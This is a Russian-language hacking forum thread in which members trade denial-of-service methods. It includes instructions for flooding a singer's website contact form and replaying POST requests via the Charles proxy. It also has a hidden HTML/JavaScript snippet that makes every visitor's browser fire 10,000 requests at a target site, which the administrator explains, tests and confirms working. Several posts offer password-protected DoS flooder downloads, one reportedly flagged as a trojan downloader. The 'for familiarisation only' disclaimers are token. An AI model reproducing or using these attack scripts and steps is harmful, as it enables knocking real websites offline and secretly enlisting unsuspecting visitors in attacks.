Крутая досерка, для ознакомления

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#11
Хацкеры ученики, ладно вам тут крутить а то Михалыч заявится.
Я вот так подумал, а нахрен нужно это всё ?Не въехал!!!

Вот я могу предложить ещё пару способов ддоса, всё-же ломать не строить...

Другое дело, ну положил ты сайт, на день, на два, а дальше что ?

Всё-же лично мне интересен взлом именно как искусство, например получить права рута на сервере через уязвимость, либо обойти какую-нить реально серьёзную защиту, таких людей всегда уважал ! ;)
По мне эти все досеры, это как насрать под дверью и ничего больше !doubledown
 
B

BioNIX

Гость
#12
X-Shar, Ну и толк что положишь сайт, смысл в этом какой, радости ребенка а потом последствия от этих атак, есть спецы которые эти прокси расшифровывают аж бегом, и твой бедный IP у них на крючке и потом уж пойдет и форум, надо задуматься над этим, это все бред ддосить, а вот уязвимости искать и без ддоса а обход защиты, чтоб не было видно следов взлома это дело техники и мастерства, но тут все на кодах по моему или как там еще они называются точно не скажу не хакер и не взломщик, не программист.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
3 002
Репутация
9 268
#13

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#14
В тему на happy-hack.ru нашёл прикольную статью:

Всем привет речь пойдет о том как положить сервер или вообще его убить, на некоторых сайтах есть такая форма называется она Контакты:

1385298810_2013-11-24_150619.jpg

То сайт певицы нюши возьмем его в качестве дос атаки, ищем строку с эмейлом этого сайта на нюшеном это
вот такие ***, я выбрал последний, вводим один из эмейлов сайта которого будем досить и эмейл должен совпадать с именем сайта !!!

Пишем в имени любое имя, в сообщении пишем, что угодно желательно нолики=))))

Открываем Charles жмем отправить ловим пакет и ставим на репит я поставил 1000000 к 20 сайт пока не ложится значит эмейл без автоответчика а если сайт с автоответчиком? он переотправляет письма много много раз.......

Еще второй метод это атака post запросами загружаем сайт смотрим какой файл передан по post запросу ставим на репит в charles и гуляем возвращаемся открываем сайт и вуаля он не открывается.

Работает с сайтами с анти-ддос защитой.....Отдыхай!!!

Всем спасибо кто читал и опублил думаю понравится статья.Dmeh-Smeh-Smeh!!!sm3888

ДЛЯ ОЗНАКОМЛЕНИЯ И ЗАЩИТЫ, ЗА ИСПОЛЬЗОВАНИЕ ОТВЕТСТВЕННОСТИ НЕ НЕСУ !
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
3 002
Репутация
9 268
#15
Нашёл на одном форуме.Этот код можно использовать для DDoS-атаки.Для этого вам нужно разместить его на главной странице своего сайта.Все пользователи заходящие на сайт автоматически принимают участие в атаке.Работает или нет-не знаю,ибо не программист.
HTML:
<div id=»attack» style=»visibility:hidden»> <script type=»text/javascript»> attack_host=»www.{атакуемый сайт}.com» attack_port=80 path=’index.html’ for(i=1;i<=10000;i++) { document.write(‘<img src=»http://’ + attack_host + ‘:’ + attack_port + ‘/’ + path + ‘?’ + Math.random() + ‘»>’);} </script></div>
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#16
Работает или нет-не знаю,ибо не программист.
Наверное лучше написать в столбик так понятней будет, что делает код:
Код:
<div id="attack" style="visibility:hidden">
<script type="text/javascript">
attack_host="www.{атакуемый сайт}.com"
attack_port=80
path='index.html'
for(i=1;i<=10000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
</script></div>
Как я понял в цикле, создаётся в браузере пользователя куча картинок, а именно 10000 картинок должно появится, браузер пользователя не повиснет ?

Вот кусок кода:
Код:
for(i=1;i<=10000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
Где:
attack_host - Это сайт;
attack_port - Порт, в данном случае 80-й;
path- Это index.html на атакуемом сайте, по идее наверное можно поменять на что-либо другое;
Math.random() - Возвращает псевдослучайное число между 0 и 1.

Теоретически должно работать, но практически попробовал я на виртуальном хосте, так ничего и не заработало, короче какая-то хрень ! ;)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#17
Кстати ещё раз попробовал работает единственное у браузера значёк загрузки долго крутится....
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#18
Ну и что-бы это реально работало, это нужно что-бы на сайт заходило куча людей в еденицу времени, т.е. если например за одну минуту на сайт заходит человек 100, то это дофига уже запросов будет, либо нужно имет много среднепосещаемых сайтов, тогда да можно положить сайт ! ;)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#19
Вот хочу выложить самую мощную программу такого типа, для ознакомления и тестирования своих сайтов, программа имеет кучу настроек в частности может запускаться по таймеру, работает с прокси и многое другое, написана Русскими кодерами и имеет русский интерфейс !

ВАЖНО: ИСПОЛЬЗОВАТЬ ТОЛЬКО ДЛЯ ОЗНАКОМЛЕНИЯ И ТЕСТИРОВАНИЕ СВОИХ САЙТОВ, ИСПОЛЬЗОВАНИЕ ЭТОЙ ПРОГРАММЫ В КОРЫСТНЫХ ЦЕЛЯХ МОЖЕТ ПОПАДАТЬ ПОД СТАТЬЮ, Я-ЖЕ ОТВЕТСТВЕННОСТИ ЗА ВОЗМОЖНЫЙ ВРЕД ЭТОЙ ПРОГРАММЫ НЕ НЕСУ И ЕЩЁ ДР. ВЕБ ДЕТЕКТИТ ПОЧЕМУ-ТО ЕЁ КАК ТРОЯН-ДОУНЛОДЕР, ХОТЬ Я НИЧЕГО ТАКОГО И НЕ ОБНАРУЖИЛ ТАМ, ТЕСТИТЬ ЛУЧШЕ НА ВИРТУАЛЬНОЙ МАШИНЕ !

Теперь коротко о самой программе:

DoS-Pro v 2.0 RC2:

1359660197_1.png


1359660181_2.png

1359660182_3.png

Программа для стресс-тестирования Web серверов на пригодность работы в случае DoS или DDoS атак.

Софт эмитирует множественные подключения к серверу с различных IP адресов, и позволяет выявить слабые места в системе.

Пароль:111
 

Вложения

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 680
Репутация
211
Jabber
#20
Чуть не забыл вот ещё одна, может атаковать методом Post + прокси граббер+чеккер:

От автора: Писал больше полугода назад HTTP флудер для приватки, недавно кто то слил в паб на турецком форуме, решил выложить.

Вкладка Home
URL: Цель для атаки
Threads: Кол-во потоков
TimeOut: Таймаут подключения
Pause: Пауза между подключениями
Method: Метод передачи (POST/GET)
Proxy: From File - берет прокси из файла proxy.txt в папке с программой, From Proxy Grabber - берет прокси из списка прокси граббера, From Proxy Checker - берет прокси из прокси чекера.
AutoGrab: Функция автограб, грабит каждые N часов из списка сайтов новые прокси

Вкладка Proxy Grabber
Обычный граббер прокси с большим списком сайтов (Можно добавлять свои)
Add: Добавить сайт для граббинга прокси (из текстового поля)
Clear All: Очистить список сайтов для граббинга
Grab: Начать грабить прокси
Stop: Остановить граббер
Save: Сохранить награбленные прокси в файл

Вкладка Proxy Checker
Простенький однопоточный чекер HTTP прокси
Proxy: From File - берет прокси из файла proxy.txt для чека, From Proxy Grabber - берет прокси из граббера для чека
TimeOut: Время подключения к прокси
Save As: Сохранить прокси под любым именем
Save: Сохранить в файл proxy.txt в папке с программой
Clear: Очистить список прокси

Вкладка Request Builder
Accept HTTP заголовок принимаемых клиентом данных
Referer: HTTP заголовок "от куда идем"
UA: HTTP заголовок User-Agent
Cookie: Передаваемые cookie

Пароль:111

ВАЖНО:ДЛЯ ОЗНАКОМЛЕНИЯ И ТЕСТИРОВАНИЯ СВОИХ САЙТОВ !!!
 

Вложения

Вверх